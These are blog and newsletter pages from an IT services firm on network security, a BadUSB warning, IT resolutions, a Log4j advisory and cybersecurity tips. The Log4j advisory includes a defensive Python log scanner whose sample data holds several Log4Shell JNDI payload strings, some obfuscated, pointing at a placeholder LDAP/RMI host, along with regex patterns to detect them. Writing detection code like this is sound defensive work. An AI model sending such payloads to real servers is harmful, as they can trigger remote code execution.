Author: leeshanok

How Network Security Works

Protecting company data, devices, network access control, and systems is critical for business operations. On average, businesses suffer more than 16 days of downtime (link to: https://www.coveware.com/blog/2020/1/22/ransomware-costs-double-in-q4-as-ryuk-sodinokibi-proliferate) after a ransomware attack. Even worse, costs of downtime and loss of network traffic range from thousands of dollars to hundreds of thousands of dollars per day.

Network security uses a combination of technology and policies to prevent attacks and reduce downtime. The goal of network security is to maintain network functionality for authorized users while preventing intrusion, data destruction, and data theft.

Various types of network security work in layers by:

  • Creating a barrier between the trusted internal network and external networks like the internet
  • Authenticating users so only authorized people can access the network
  • Alerting administrators to intrusion attempts
  • Preventing viruses and malware from infecting the network

In addition to preventing downtime, these types of network security protect sensitive information, keep businesses in compliance with regulations, and much more. Our guide to Why Cybersecurity is Important (link to:https://www.leeshanok.com/why-cybersecurity-is-important/) covers all the reasons network security should be a priority.

What is Network Security?

Network security is a combination of technology, people, and policies. These work together to protect network connected devices, IT infrastructure, and data that flows through the network. It protects the network from both internal and external attacks.

Network Security vs. Cybersecurity

Network security is a subset of cybersecurity. Cybersecurity is the broader protection of a company’s entire digital system. It includes protecting the network, but also includes protecting against social engineering, educating employees on security best practices, and ensuring technology remains safe to support continued operations.

Network security is the more specific protection of network connected devices and the data flowing between them. Network security is typically more concerned with protecting IT infrastructure with purpose-built hardware and software solutions. It protects against technical cyberattacks like:

  • Viruses and worms
  • Denial of service (DoS) attacks
  • Trojan Horses
  • Zero-day exploits

Network security is a part of cybersecurity, so the two are closely related. This can make them hard to distinguish from each other. Let’s look at a common example. Two malicious emails are sent to your company. One is a phishing email attempting to trick employees into giving up confidential information. The other is an email with a malicious attachment that will install malware on the victim’s computer.

Phishing

Cybersecurity protects against the phishing email by training employees to recognize and avoid phishing attempts. Trained employees will not respond with sensitive information. 

Network security protects against the malicious email attachment. The network firewall could prevent the email from ever making it to an inbox. If the email makes it past the firewall, content filtering could remove the attachment. If an employee does get the email and attempts to install it, antivirus software could prevent installation or remove the harmful program before it has a chance to do much damage.

There are many components of network security that work together to keep the network, and company, safe.

Elements of Network Security Work

Network security requires technology, policies, and people to all work together. Each of these elements must be configured to work with the others so that the network remains functional for authorized users while keeping bad actors out.

Firewalls

Firewalls are network security devices that monitor incoming and outgoing network traffic. They are configured to allow safe data packets to pass through while blocking unsafe data packets. 

Think of your network as a castle. Your firewall is like the guards at the gate. They check everyone coming in and going out. Your firewall guards open the drawbridge for safe, trusted people, and close it when dangerous ones try to get in.

Next Generation Firewalls

Next Generation Firewalls (link to Next Generation Firewalls) include the same functionality as traditional network security firewalls plus additional features like an Intrusion Prevention System that blocks unauthorized users, content filtering, and real-time updates.

In the castle example, next generation firewalls would be guards at the gate who would receive updates from other castles about dangerous people to look out for. They’d also be able to remove unwanted people more forcefully.

Intrusion Prevention Systems

Intrusion Prevention Systems (IPS) (Link to: Intrusion Prevention Systems) are hardware or software solutions that detect intrusion attempts against your network, automatically remove the intruder from the network, and alert IT administrators to both the attempt and the response. Together, these layers make up a robust network security system.

The IPS is either part of a next generation firewall or a standalone solution. Either way, it’s a necessary component of network security because it is updated to protect against new security threats in real time, and it responds to intrusion attempts instantly. This removes the potentially dangerous delay that is inevitable when a network security threat requires human intervention.

With the volume and frequency that hackers create new attacks and discover vulnerabilities, it is critical your network is protected by a system that can adapt.

Content Filtering

Content filtering protects your company in two ways. First, it protects your network from malicious websites and email attachments. Second, it protects the company from the liability of employees accessing inappropriate content on the company network.

Content filtering, with its targeted access control, can also be either part of a next generation firewall or a standalone solution. Content filters do what the name suggests: they analyze keywords, phrases, and other data strings in all content accessed on the network, and they filter out dangerous content and any content that violates company policies.

Web content filtering (link to Web Content Filtering) and email content filtering are the two most common forms of content filtering.

VPN or Virtual Private Network

Virtual Private Networks allow remote employees to safely connect to the company network. A virtual private network encrypts valuable data; this is especially important for employees who are working from home. 

Physical networking infrastructure is traditionally housed in the company’s building. Employees who work in that building can connect to the network without a VPN. However, offsite employees still need access to the same applications and data housed on the network. VPNs create a secure tunnel to the company network that employees can access using their own internet connections.

Site-to-site VPN

Site-to-site virtual private networks can also be used to connect branch offices. Say your company has three offices. Your headquarters in Building A houses the physical networking infrastructure. Offices B and C don’t have any physical network infrastructure but can connect to the company network in Building A using a VPN.

Cloud Security

Many businesses are moving from physical network infrastructure to cloud services, which are more accessible on mobile devices. Security is still important even if the network hardware is owned by a third party and hosted offsite, as unwanted parties are increasingly targeting mobile devices. 

A traditional network security system focused on building a perimeter around the network. With the cloud, there is no perimeter because it is accessible on any device. Keeping data secure is the new focus. This requires more secure authentication, encryption, endpoint security, and data segmentation.

The Cloud

Moving fully to the cloud also means the business is reliant on another company to keep the physical network devices safe and operational. The leading cloud providers promise the highest levels of uptime and security.  

The cloud isn’t necessarily insecure by default, but it requires a different way of thinking and different questions to ask the cloud providers.

Network Security Professionals

The people behind network security are often the most overlooked element. These professionals design, install and maintain network security infrastructure. Without them, network security becomes outdated, and infrastructure starts to fail.

It takes a high degree of technical knowledge and certification to keep a network properly secured. Businesses have a few options for how to obtain these essential personnel. They could staff and train an internal IT department. This is a good option for businesses with a lot of resources. A full team is usually necessary to cover all IT functions and avoid skill gaps. This keeps the talent in-house, but is the most expensive option.

Managed IT Provider

Businesses could also hire a managed IT provider like LeeShanok. Managed service providers (MSPs) supply the fully trained teams and partner with you to keep your network secure. This is generally the most affordable option, and a good choice if you prefer not to have internal IT staff. 

The third option is often the best: partnering internal IT staff with an MSP. A good MSP works as a team with internal IT staff. They complement each other’s skills to fully protect your network. The MSP can cover the gaps in the current IT department at a lower cost than hiring additional personnel.

How Secure is My Network Traffic?

Starting to think about your own company’s network security? LeeShanok’s Network Security Assessments (link to: network security assessment) are a great check-up to see how healthy your network is. We’ll give you a network security report card with actionable steps to better protect your company.

Hackers Mailing Bad USB Drives

LeeShanok IT News

According to a new FBI warning, cyber criminals are mailing USB drives capable of installing malware onto business networks. These known “BadUSB” attacks claim to be either a message from the Department of Health and Human Services regarding COVID-19 or a gift from Amazon.

In these recent cases, USB drives injected keystrokes onto the victim’s computer. These keystrokes led to the installation of ransomware. This is one of many possible attacks BadUSB drives are capable of.

What should I do?

Never plug in an unfamiliar USB Drive. This includes devices received in the mail or found out in the street. Be extra cautious of USB drives with enticing labels like “Bitcoins” or “Gift Cards.” It’s best to dispose of these devices immediately.

If you come across a USB Drive you think may have important data on it, send the device to your IT provider. They will be able to view the contents in a secure sandbox environment.

USB Security, and Other Cybersecurity Tips, in This Week’s Webinar

USB Security is just one of the many important topics covered in the IT Security Awareness for the Common Worker 101B training.

The free training will take place this Thursday, January 13th from 11am – 11:45am. Topics include:

  • Next gen phishing prevention
  • USB Safety
  • Strengthening your Human Firewall
  • Updates & Patches
  • & Much More

Miss last month’s 101A training? No problem! 101B is a standalone webinar with crucial cybersecurity tips for every employee, regardless of IT expertise. Hope to see you there!

LeeShanok Network Solutions

3877 N 7th Street | Suite 320 | Phoenix | Arizona | 85014
ITNews@leeshanok.com

LeeShanok IT News – IT Resolutions for 2022!

The new year is just around the corner! As the calendar turns, it’s a great time to reflect on what you want from the year ahead. Here are our top five IT resolutions for 2022.

Top 5 IT New Year’s Resolutions

  1. Set your IT roadmap – What goals do you have for your technology next year? What will no longer be supported in 2022? What kind of support will you need? A clear destination makes the journey much easier.
  2. Schedule annual cybersecurity training for everyone at your company. Cybercrime is expected to increase again in 2022. Education is the best defense, so make sure everyone is well trained. Our next cybersecurity training is Thursday Jan. 13th. Register Here.
  3. Get adequate cyber insurance – With the increasing risk, cyber insurance is growing more and more important. Make sure you have an appropriate policy. Riders on your general liability policy may no longer be enough.
  4. Invest in collaboration – The shift to hybrid and fully remote work is expected to continue in 2022. Make sure you’re getting the most from your collaboration tools so your teams don’t become isolated.
  5. Thoroughly assess your cloud strategy – Businesses are expected to continue migrating more functions to the cloud. This opens the door to higher efficiency and lower costs, but getting the migration right can be difficult. Each vendor, and their reliability, security, and functionality, must be carefully considered.

As always, LeeShanok is happy to help! Let us know how we can help you stick to these resolutions, or any others you’re making for 2022.

LeeShanok Network Solutions is Turning 25!

On January 1st, LeeShanok will officially turn 25! We’re excited we can finally rent a car, but we’re even more excited to continue helping you manage your technology.

Our success is thanks to you, our clients. Since 1997, you have challenged us to grow and adapt. The technology landscape is entirely different today than it was back then but supporting happy clients has kept us motivated to keep learning and keep getting better.

From the entire LeeShanok team, our sincerest THANK YOU! We have a lot of exciting things planned to celebrate, stay tuned!

Your Technology Partner,

The LeeShanok Team

Phoenix:  602-277-5757         Tucson:   520-888-9122         ITNews@leeshanok.com

LeeShanok IT News – Major Vulnerability – Log4j Exploit

Last week, a significant cybersecurity vulnerability was identified dubbed Log4j or Log4Shell. The vulnerability allows hackers to remotely control a victim’s computer/server by running malicious code using an exploit in the Log4j library. The exploit is easy to execute and very widespread because the Log4j library is used in many software packages and online systems.

Because of the ease of attack, its widespread nature, and the potential damage, this is considered riskier than 99.61% of all cybersecurity vulnerabilities.

What Hackers Are Doing

Currently, hackers are primarily scanning for vulnerable devices and taking control of them to mine for cryptocurrency. However, it is possible for them to take much more malicious actions using this exploit.

What LeeShanok is Doing

We have seen scans and remote control attempts on several of our clients’ servers. Thankfully, next generation firewalls have successfully blocked these attempts at gaining control. If you are not sure if you have the correct type of firewall protecting you, ask your account manager.

For all of our managed IT clients, we are automatically patching using the following process. This is included in your managed IT plan:

  1. Checking to see if a breach has been attempted
  2. If so, checking to see if any payloads have been executed
  3. If so, assessing the risk level of the payload
       1. If the risk is low, performing a malware scan
       2. If the risk is high, taking the system offline and restoring from backup
  4. Applying security patches and rebooting if needed
  5. If there is a next generation firewall, confirming it is configured to block intrusion attempts
  6. Performing a vulnerability scan to confirm the patch was successful
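As an added illustration of step 1 of this process (checking whether a breach has been attempted), the script below is example code written for this page, not LeeShanok's tooling. It scans web-server access log lines for the JNDI lookup strings that Log4Shell scanners send, including URL-encoded and nested-lookup forms that hide the word "jndi" from a naive string match. The log lines are constructed samples using documentation IP ranges.

```python
"""Scan web-server access log lines for Log4Shell-style JNDI lookup strings.

Added example for step 1 (checking for breach attempts); not LeeShanok's own
tooling. SAMPLE_LOG below is constructed test data, not real traffic.
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one with no further "${" nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# The indicator we are hunting for once obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample lines in Apache/nginx combined format; attacker-controlled
# text arrives in the request path and the User-Agent header.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.8 - - [11/Dec/2021:10:01:15 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.9/b} HTTP/1.1" 400 0 "-" "curl/7.68"
203.0.113.9 - - [11/Dec/2021:10:01:21 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fc%7D"
203.0.113.4 - - [11/Dec/2021:10:01:30 +0000] "GET /docs/jndi-howto HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def _resolve_inner(expr: str) -> str:
    """Evaluate one simple Log4j 2.x lookup the way the library would.

    Only the forms commonly used to disguise 'jndi' are handled: lower/upper
    case conversion and the ':-' default-value syntax (e.g. ${::-j}). Anything
    else, including the jndi lookup itself, is returned unchanged.
    """
    head, sep, rest = expr.partition(":")
    if not sep:
        return "${" + expr + "}"
    key = head.lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in expr:
        # ${env:UNSET:-j} or ${::-j} resolves to the default after ':-'
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"


def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes.

    Terminates because each pass either shrinks the text or leaves it as-is;
    resolved values can never reintroduce a '${' sequence.
    """
    prev = None
    while prev != text:
        prev = text
        text = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
    return text


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup after decoding and normalizing."""
    return bool(_JNDI.search(normalize(unquote(line))))


def scan_lines(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (line_number, excerpt) for every line carrying a JNDI lookup.

    The excerpt is the normalized indicator, handy for an incident ticket.
    """
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        decoded = normalize(unquote(line))
        match = _JNDI.search(decoded)
        if match:
            hits.append((number, decoded[match.start():match.start() + 40]))
    return hits


if __name__ == "__main__":
    for number, excerpt in scan_lines(SAMPLE_LOG.splitlines()):
        print(f"line {number}: {excerpt}")
```

A hit means an attempt was made, not that the payload executed; step 2 of the process still applies.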

If you are not a managed IT client, and you would like our team to assist with assessing your systems, please reach out to us for support.

What You Should Do

Stay alert for any updates/patches pushed out by your other technology vendors and install them immediately. Keep an eye out for further communication from LeeShanok pertaining to your unique situation.
 
The LeeShanok Team
 

How to Improve Cybersecurity

IT cyber security is designed in layers. Digital threats to a company usually originate from outside. Threats that breach a layer tend to settle in and seek other devices at the same layer. When the attempt to breach the next layer is made, malicious programs will make attempts from multiple devices. By the time inner layers are breached, many devices have already been compromised, and exfiltration of company data has probably already occurred. See Why Cybersecurity is Important.

With network infrastructures that include both on-premises and cloud-based infrastructure, layering your network cybersecurity to protect it all can be challenging. Historically this would require unique solutions for each part of the infrastructure, but today there are solutions available that simplify and consolidate monitoring and management. There are many ways to protect against threats. Below are actionable ways to improve your firm’s cybersecurity.

End Users & Devices

Protect Wi-Fi Network Access from Cyberattacks

Many firms have both staff Wi-Fi and guest Wi-Fi networks. There’s usually a password required to connect to the staff Wi-Fi, but many times the guest network has no password. This opens the door for direct cyberattacks against connected devices. Use a password on all your firm’s Wi-Fi networks.

Another issue emerges with Wi-Fi authentication when an employee is terminated. The terminated employee could park close by and connect to the guest Wi-Fi (open) or staff Wi-Fi network (Wi-Fi password still the same), where they could launch attacks against other connected devices or seek company data to steal.

Most firms do not change the Wi-Fi password on termination of an employee because it requires all remaining employees to change the password in the devices they connect with. As time goes by, more and more terminated employees will have access to the company’s Wi-Fi networks. Adding a RADIUS Server to your Wi-Fi authentication fixes this by coordinating with the user’s Active Directory (AD) account. When an employee is terminated, simply marking their AD account “inactive” prevents them from connecting to the Wi-Fi network. No other employee’s access is affected.

Security Measures on Mobile Devices

Regardless of operating system, many employees use personal mobile devices to read company email, log in to cloud accounts, generate and send quotes, and other tasks that require access to company networks and data.

These employee devices may not meet sophisticated cybersecurity measures the company demands from connected devices, and are therefore vulnerable to external access and cyberattacks. If an employee loses their device, all the data and stored credentials may be available to cyber criminals.

To guard against these risks, it’s important for companies to use a Mobile Device Manager (MDM) and enroll all personal phones that are used for company business. Good MDMs push group security policies to enrolled devices, and also locate or wipe a lost phone. Employees should also set up “Find My Phone” while they have the device in their possession so that lost devices are easier to recover.

Utilize Group Policies for Cybersecurity

Group policies are central rules that can be applied to all devices that access company resources. Common cybersecurity policies can be designed for all user accounts and devices at time of login. Policies can also be designed by groups. For example, senior management devices have different cybersecurity rules than front-line workers.

Pushing out cybersecurity policy in this fashion eliminates the need to sit at each device and configure its security in case of a security breach, and it provides common security policies to all employees with certain job types or common access to specific data stores.

Improve Employees’ Password Management

Many employees have a favorite password they never forget, and they use it across multiple websites and their domain login. A data breach at just one of those sites, and all the employee’s accounts are compromised. A better strategy is to use a different password on each site, but that can be impossible to remember without writing them down, another risky practice.

The best strategy is to use a company-wide password manager that generates complex passwords and provides access to password folders via role-based policies. Some password managers provide segmentation of each user’s passwords with their own secure folder, allowing them to manage both their personal and professional passwords. With this strategy, your employee only needs to create and memorize one strong password for the password manager.

Enable Multi-Factor Authentication on All Your Accounts

Enabling two factor authentication adds a layer of protection to each user account’s sensitive information on personal devices. When logging in, after the username and password are accepted, the site sends a text or a notification to an authenticator app on your phone. If you verify the notification, then the connection is completed.

Strong authentication is particularly useful in squashing security risks like a stranger’s attempt to access one of your online accounts and steal your personal data. You would receive a notification about a login attempt you did not initiate. That would be a good time to change the account password to a different strong password, as it’s clear someone has the current credentials or personal information.

Individuals can reduce their cyber risk by enabling MFA on many individual sites, but a faster way is to have your IT department or your managed IT service provider require it for all accounts.

Require Cybersecurity Training

The user is the most important security measure, and an educated user fortifies all other layers of security. Up to 95% of cybersecurity breaches are the result of human error, so it’s important to have all employees regularly trained on cybersecurity best practices.

Many webinars and in-person trainings are available to keep your business safe, but it’s important to select a provider who is knowledgeable and has invested in the quality and delivery of the material.

LeeShanok’s IT Security for the Common Worker series is a free, monthly webinar that teaches cybersecurity best practices to employees of all levels of IT skill. LeeShanok also offers custom, in-person training to Arizona businesses.

Local Network Infrastructure

Assess Your Network Infrastructure and Security

Before making changes to your network, it’s important to assess what you currently have and create a network diagram if one does not exist already. Making changes without understanding the current network layout can result in additional complexity and reduced security.

If you’re not sure where to start, most managed IT service providers (MSPs) offer network assessments that generate documentation of the infrastructure, credentials, configurations, and recommendations to improve security.

Some MSPs like LeeShanok also offer network security assessments, which include the network assessment documentation along with analyses of the security posture and the risks that are present. A network security assessment may also include penetration testing to test actual vulnerabilities.

Segment Your Network

If you have two Wi-Fi networks (like a staff and guest network), segmenting the two into VLAN 1 & VLAN 2 provides a security barrier. Devices and sessions running in one VLAN are blocked from accessing devices in the second VLAN. Network segmentation can be physical or logical and involves breaking down a network into smaller subnets.

Segmenting your public Wi-Fi architecture and maintaining software updates helps simplify management of firewall policies, reduces the overall attack surface, and strengthens your firm’s security.

Proactively Manage Infrastructure

It is very important that the cybersecurity of your network not be a set-and-forget exercise. Even the best defenses see reduced protection over time as bad actors test for and identify vulnerabilities. Many smaller firms use home-grade devices, resulting in big security holes for sophisticated breach strategies.

It is challenging and expensive for internal staff to continuously manage these risks, which is why many use a “set and forget” strategy. Professional Managed IT Service Providers solve this by specializing in proactively securing, fixing, and updating technology more affordably than additional internal staff.

Consider hiring a Managed IT Provider if your internal resources aren’t able to regularly research and deploy new cybersecurity strategies to keep up with the evolving threat landscape.

Replace Legacy Devices

Improve your cybersecurity posture by replacing aging devices with new devices that have more sophisticated and coordinated security features. Work with your internal IT or your managed IT service provider to select new devices that align with your overall IT strategy.

Following deployment, it is also important for you or your managed service provider to actively manage infrastructure components, keep their firmware and software up to date, and investigate all notifications when threats are detected.

Update Firmware and Software in All Devices

Many attacks exploit vulnerabilities in networking, server and end-user devices. Manufacturers respond to discovered vulnerabilities by developing and releasing updates and patches to both firmware and embedded software. Most devices do not automatically install updates, so there is human involvement needed to search for and install updates to devices. This process should be repeated at least quarterly for all infrastructure devices. Learn how to Update Firmware in Network Devices.

Software suites also regularly release updates and patches to be installed. Some are installed automatically, while others need to be manually installed. All employees should be keeping software up to date.

Use SSL VPN for Site-to-Site Connections

Virtual Private Networks (VPNs) have been a secure method to remotely connect to company resources for years. Unfortunately, most VPN software apps have vulnerabilities that can allow a hacker to gain admin access to the interface, opening it up for rogue connections to a company domain.

Upgrade to SSL VPN connections, which require an SSL Certificate be purchased and imported into each connected firewall to establish trust. New VPN software is required on end user devices to allow connection via SSL VPN.

Other permanent VPN tunnels may be used to connect a local network to a cloud hosted environment like Microsoft Azure. SSL VPN should be used here as well to protect the connection and access to the hosted environment.

See LeeShanok’s IT News articles on:  SSL/TLS Migration for PCI Compliance, Work Remote Securely

Manage Firewall Ports

Firewall ports are used for computer-to-computer communication. Many firewall ports are open by default, like 443 for internet traffic. Some ports should be managed more actively, opening when network packets need to pass and then closing until the next packets need to pass.

Ports can be closed by disabling the service or by using network firewall rules that Deny-All-Permit-By-Exception (DAPE). Disabling Universal Plug and Play (UPnP) in the firewall also prevents any computer in the network from opening ports without challenge.

Enabling both network firewall and host-based firewall capability is a best-practice. Enabling firewall rules will block external services, but should be tested to make sure desired services can still communicate.

On end-user computers, port management is done by antivirus apps. It’s usually fine to allow the default configuration, but some firms may have a group policy that pushes out different security policies to all end-user devices.

Set Up GeoLocation and GeoBlocking

Certain geographies are known to present greater cybersecurity risks. For example, more cyberattacks originate from China and Russia than any other countries. GeoLocation estimates where a connection originates, and GeoBlocking blocks connections from those regions.

If your company doesn’t do business in a risky geography, it should be GeoBlocked by default. Most newer firewalls have this option available.

Cloud Infrastructure and Services

Migrate from Backups to Business Continuity & Disaster Recovery

To recover from a breach, infection or ransomware, backups are the best method. Traditional backups usually involved an external USB drive physically plugged in to a server or end user computer. This backup method may not include cloud-based data, it doesn’t protect against an on-premises disaster, and recovery may take longer.

Modern backup capability includes business continuity and disaster recovery (BCDR), which backs up operating systems, Active Directory configurations, and storage. BCDR usually involves an on-premises backup which has the ability to complete a restoration in a few minutes or hours, rather than the days or weeks a server re-build requires. There’s also a redundant cloud-based backup in the event of an on-premises disaster.

Diagram of the structure of Datto’s Siris BCDR solution.

Backup your Cloud Environments

Modern backup strategies should also include important Software-as-a-Service (SaaS) accounts like Microsoft 365 or Google Workspace. Microsoft protects their data center and all data from natural disasters and failures. However, you are responsible for data loss due to human error, external hackers, malicious insiders, and more.

Approximately 90% of all companies use the cloud in some capacity and falsely assume data is backed up automatically. SaaS Protection for cloud accounts is a must-have for a modern backup strategy.

Monitor Dark Web for Compromised Company Credentials

Dark web monitoring generates reports of users in your domain whose usernames and passwords are found for sale on the Dark Web. A Dark web monitoring service can notify you when those credentials are compromised, so you can have the employee reset passwords and enable Multi-Factor Authentication.

LeeShanok offers a complimentary Dark Web Scan that shows the compromised usernames and passwords of everyone with an email address on your company’s domain.  

Migrate from EDR to XDR

Endpoint Detection and Response (EDR) is the traditional method of monitoring endpoints for advanced persistent threats and new malware that may evade defenses. Extended Detection and Response (XDR) spans platforms, endpoints, on-premises environments, and cloud environments.

XDR usually provides a “single pane of glass” view for monitoring and responding to threats. XDR also uses artificial intelligence (AI) to scan various logs from multiple platforms and provide accurate, context-rich alerts.

Plan for Secure Access Service Edge (SASE)

SASE is a new framework in which networking and security converge into a single integrated service that works at the cloud edge to deliver networking and security functions as a service. With widespread cloud adoption, the SASE model simplifies and consolidates many different networking and security functions.

The technology is still in its early stages, but expect to adopt this model soon if your organization hasn’t yet. As an example, Cisco’s SASE offering includes:

  • SD-WAN
  • Cloud security
  • Zero trust conditional access
  • Umbrella security
  • Secure access by DUO
  • ThousandEyes for network outage monitoring

Hire a Managed IT Security Provider

As you can see, improving cybersecurity can be a challenging task. It requires constant vigilance and a high degree of technical expertise. Threats like ransomware are increasing every year, and businesses of every size are lucrative targets.

Many companies choose to hire managed IT service providers for their IT security. It’s generally more cost-effective, and the knowledge pool is deeper than what can be achieved with most internal IT teams. LeeShanok has been providing IT security since 1997. Request a complimentary network assessment to find out where your network is vulnerable, and which steps are most important for you to take.